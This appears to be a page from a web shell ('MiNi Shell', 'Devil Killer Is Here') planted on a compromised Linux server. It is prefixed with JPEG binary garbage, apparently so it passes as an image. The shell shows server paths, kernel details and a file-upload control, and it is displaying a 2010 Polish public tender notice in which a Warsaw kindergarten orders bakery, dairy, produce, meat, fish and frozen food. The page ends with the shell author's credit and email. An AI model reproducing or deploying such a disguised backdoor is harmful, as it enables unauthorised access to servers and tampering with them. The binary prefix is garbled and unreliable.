JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/393934-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 7 pakietów</b><br>
<b>Numer ogłoszenia: 393934 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole z Oddziałami Integracyjnymi Nr 20 , ul. Sempołowskiej 2a, 00-574 Warszawa, woj. mazowieckie, tel. 22 628 47 45, 797 409 153, faks 22 628 47 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p20@edu.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 7 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 7 pakietów:
1: Pieczywo wyroby piekarskie 
2: Nabiał 
3: Warzywa, Owoce, Mrożonki, Jaja 
4: Mięso, Wędliny 
5: Produkty pozostałe 
6: Ryby 
7: Mrożonki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.50.00.00-3, 03.20.00.00-3, 03.10.00.00-2, 03.14.25.00-3, 15.10.00.00-9, 15.00.00.00-8, 15.20.00.00-0, 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga udokumentowania spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ogólny oferty; oferta cenowa; pełnomocnictwa dla osób podpisujących ofertę; ustanowienie pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy;wpis do ewidencji działalności gospodarczej lub inny dokument, z którego wynika umocowanie do reprezentowania wykonawcy, o ile nie jest to przedłożone w ramach załącznika Nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie przewiduje się zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z wyjątkiem zmian, których konieczność wprowadzenia wynika z  okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te  są  korzystne dla Zamawiającego, zmian przewidzianych w § 2 ust. 3 projektu umowy załączonego SIWZ, a nadto gdy: 1. nastąpią przekształcenia własnościowe, 2. nastąpią zmiany techniczne lub organizacyjne, 3. nastąpią zmiany adresu, 4. zmianie ulega nr katalogowy lub  wielkość opakowań, przy czym cena musi być proporcjonalna do ceny podanej w ofercie, 5. następuje konieczność poprawienia pomyłek, 6. Wykonawca nie dostarczy przedmiotu umowy w  terminie określonym w § 1 ust. 3, Zamawiający zastrzega sobie prawo dokonania zakupu interwencyjnego od innego Wykonawcy w ilości i asortymencie niezrealizowanej w terminie dostawy. W przypadku zakupu interwencyjnego zmniejsza się wielkość przedmiotu umowy o  wielkość tego zakupu, 7. wprowadza się zamienniki o właściwościach takich samych lub  lepszych (w razie zakończenia produkcji , wstrzymania, wycofania produkcji) - cena  nie  wyższa niż w ofercie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p20@edu.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole z Oddziałami Integracyjnymi Nr 20
ul. S. Sempołowskiej 2a, 00-574 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2010 godzina 15:00, miejsce: PRZEDSZKOLE Z ODDZIAŁAMI INTEGRACYJNYMI Nr 20
00-574 WARSZAWA, UL. S. SEMPOŁOWSKIEJ 2A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, WYROBY PIEKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka Kajzerka 40 g	szt	800
Bułka Wrocławska 250 g	kg	900
Bułka Grahamka 100 g	szt	500
Drożdżówka z jabłkiem 60 g	szt	200
Drożdżówka z serem 60 g	szt	200
Drożdżówka z budyniem 60 g	szt	200
Rogal min. 100 g	szt	600
Chałka duża 350 g	szt	100
Chleb biały duży 570 g	szt	400
Chleb razowy 500 g	szt	400
Chleb razowy z ziarnem 500 g	szt	400
Pączki 50 g	szt	600
Croissant francuski 70 g	szt	300
ciastka w paczkach po 200 g	szt	500
bułki maślane	szt	500
ciasta na wagę różne smaki	kg.	100
Ciasto drożdżowe	kg.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło w kostkach 200g min.75 % tł	op.	800
Mleko 2 % pasteryzowane - opakowanie foliowe	litr	5 000
Twaróg półtłusty	kg	390
Ser topiony 40% tł. 100 g	szt.	180
Śmietana do zupy 18% 0,5 l	op.	240
Deser ze śmietaną min. 175 g	op.	500
Deser pianka min. 90 g	op.	500
Jogurt 150 g	op.	500
Jogurt pitny 1l	op.	30
Serek homogenizowany min. 140 g różne smaki	op.	1 400
Śmietana tortowa 36% 0,5l	op.	10
serek typu ostrowia 	szt.	300
Maślanka 1litr 	szt.	30
Ser żółty 45% tł, 90% s.w.s.	kg.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA, OWOCE, JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cebula	kg	60
Groch łuskany	kg	28
Jabłka	kg	800
Kapusta biała 	kg	150
Kapusta czerwona	kg	60
Kapusta kiszona	kg	250
Kapusta pekińska	szt.	100
Marchew świeza	kg	300
Ogórki kiszone	kg	140
Ogórki świeże	kg	100
Papryka świeża	kg	70
Pieczarki	kg	50
Pietruszka korzeń	kg	10
Pomidory świeże	kg	200
Selery	kg	70
Fasolka szparagowa	kg	20
Kalafior	szt.	25
Ziemniaki	kg	3000
Jaja kurze średnie 	szt.	6000
Banany	kg	200
Por	kg	40
Cykoria	szt.	30
Sałata	szt.	130
Gruszka	kg	380
Fasolka biała	kg	20
brokuły	szt.	20
Cukinia	kg	20
Rzodkiewki	szt.	180
Koper	p.	450
Natka	p.	500
szczypiorek	p.	200
Dymka	p.	70
Burak	kg	40
Włoszczyzna swieża	p.	600
Pomarańcze	kg	120
Mandarynki	kg	70
Winogrona	kg	50
Brzoskwinie	kg	30
Nektarynki	kg	30
Cytryny	kg	25
Kiwi	szt.	500
Ananasy w puszce	szt.	50
Brzoskwinie w puszce	szt.	50
Śliwki	kg	60
Truskawki	kg	20
Arbuzy	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.10.00.00-2, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Karkówka bez kości	kg	30
łopatka wieprz.b/k	kg	180
Schab bez kości	kg	40
Piersi z kurczaka	kg	50
Piersi z indyka	kg	80
Szynka wiep.b/k	kg	40
Kurczaki	kg	300
Udka kurczaka	kg	60
Wątróbka drobiowa	kg	45
Cielęcina przednia	kg	30
Wołowe zadnie	kg	15
Pręga wołowa	kg	40
Boczek wędzony	kg	20
Boczek surowy	kg	10
Cielęcina zadnia	kg	15
Żeberka wieprz.	kg	10
Udziec z indyka	kg	60
Żoładki drobiowe.	kg	15
Kura rosołowa	kg	20
Udziec kaczy	kg	10
Słonina	kg	16
Golonki indycze	kg	20
Golonki wieprzowe	kg	10
Parówki drobiowe	kg	80
Parówki wieprzowe odtłuszczone	kg	80
Kiełbasa podwawelska	kg	50
Kiełbasa myśliwska	kg	20
Polędwica sopocka	kg	16
polędwica łososiowa	kg	16
Kiełbasa myśliwska	kg	10
Kiełbasa biała	kg	40
Szynka drobiowa	kg	10
szynka gotowana	kg	20
Szynkowa	kg	10
Kabanosy	kg	17
Pasztet drobiowy	kg	18
Pasztet w puszkach	szt.	150
Pasztet tradycyjny	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRODUKTY POZOSTAŁE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chrzan tarty słoik 0,27 kg	szt.	30
Cukier puder 0,5 kg	szt.	15
Cukier waniliowy a 32 g	szt.	100
Ćwikła z chrzanem 0,27 l słoik	szt.	20
Dżem wysokosłodzony trusk. 0,27kg	szt.	150
Herbata granulowana a 100 g	kg	5
Kasza jęczmienna wiejska 1kg	kg	60
Kasza manna	kg	30
Kawa zbożowa typu Inka 500 g	szt.	50
Koncentrat buraczany 	szt.	30
Koncentrat pomidorowy 200g	szt.	300
Majonez 280g	szt.	80
Makaron nitki	kg	50
Makaron świderki	kg	50
Margaryna	kg	10
Mąka poznańska	kg	300
Mąka ziemniaczana	kg	30
Miód wielokwiatowy 	szt	10
Musztarda a 180 ml, 175 g 	szt.	20
Ocet 0,5l	szt.	3
Olej 0,900 g	litr	180
Płatki kukurydziane typu Nestle 250 g	op.	100
Płatki owsiane	kg	30
Ryż	kg	80
Herbata owocowa torebka 20 szt.	szt.	50
Kakao 18% 100 g	szt.	50
Sól 1kg.	kg	70
Syrop z cytryny (słodka zaprawa) op. a 0,5l	szt.	20
Kisiel na 0,5l	szt.	200
Budyń na 0,5l	szt.	200
Cukier	kg	680
Pietruszka susz. 	op.	5
Czosnek granulowany 	op.	5
Kminek 	op.	5
Kwasek cytrynowy 0.05	op.	60
Liście laurowe 0,01	op.	50
Majeranek 10 g	op.	50
Papryka słodka 10 g	op.	20
Pieprz mielony czarny 20 g	op.	50
Przyprawa Kucharek lub odpowiednik	kg	3
Przyprawa do potraw w płynie	op.	26
Ziele angielskie 10 g	op.	30
Kostki rosołowe 12 szt po min.10 g	op.	50
drożdże 	kg	4
proszek do pieczenia 30 g	szt. 	30
soki owocowe w op 1 litr	szt.	600
soczki owocowe w op 0,2	szt.	300
rumianek p.20 szt	op.	40
mięta p.20 szt	op.	40
szczaw w słoikach 200 g	szt	40
ogórki przecier 200 g	szt	40
owoce suszone	kg	20
sosy do mięs	szt	30
keczup łagodny min 480 g	szt	20
Makaron nitki	kg	100
makaron do sosu	kg	60
Żur w torebkach	szt.	100
Barszcz biały	szt	100
kerm do pieczywa typu nutella 0,5 kg	szt.	30
krem do ciast 0,200	szt	40
oliwa z oliwek 1 litr	szt	20
galaretki owocowe	szt	200
kukurydza w puszkach 285 g	szt	20
czerwona fasolka konserwowa	szt	28
Płatki kukurydziane 0,250 g	szt	75
Płatki śniadaniowe 0,250 g	szt	80
Mieszanka musli 0,250 g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby mrożone - Mintaj płaty extra	kg	60
Sola filety mrożone	kg	60
Tuńczyk w oleju min. 170 g	szt	60
Sardynki rybne w pusz. 120 g	szt	50
dorsz świeży	kg	30
Tuńczyk w sosie wł min. 170 g	szt	30
panga filet min170g pak po 10 szt	szt	30
Makrela wędzona	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka warzywna 7-składnikowa mrożonka	kg	80
mieszanka owocowa mrożonka	kg	200
Truskawka 	kg	60
Fasolka szparagowa	kg	80
Szpinak	kg	30
Brukselka	kg	20
Buraczki	kg	20
Marchew w kostka	kg	20
Marchew z groszkiem	kg	20
Kalafior	kg	25
Bukiet warzyw	kg	30
Kluski ślaskie	kg	50
Kluski kopytka	kg	50
Uszka z kapustą	kg	10
Włoszczyzna w paski	kg	60
Pyzy	kg	20
Włoszczyzna na patelnię	kg	10
Zupa jarzynowa	kg	20
Barszcz ukraiński	kg	10
Porzeczka czarna	kg	30
Jagody 	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com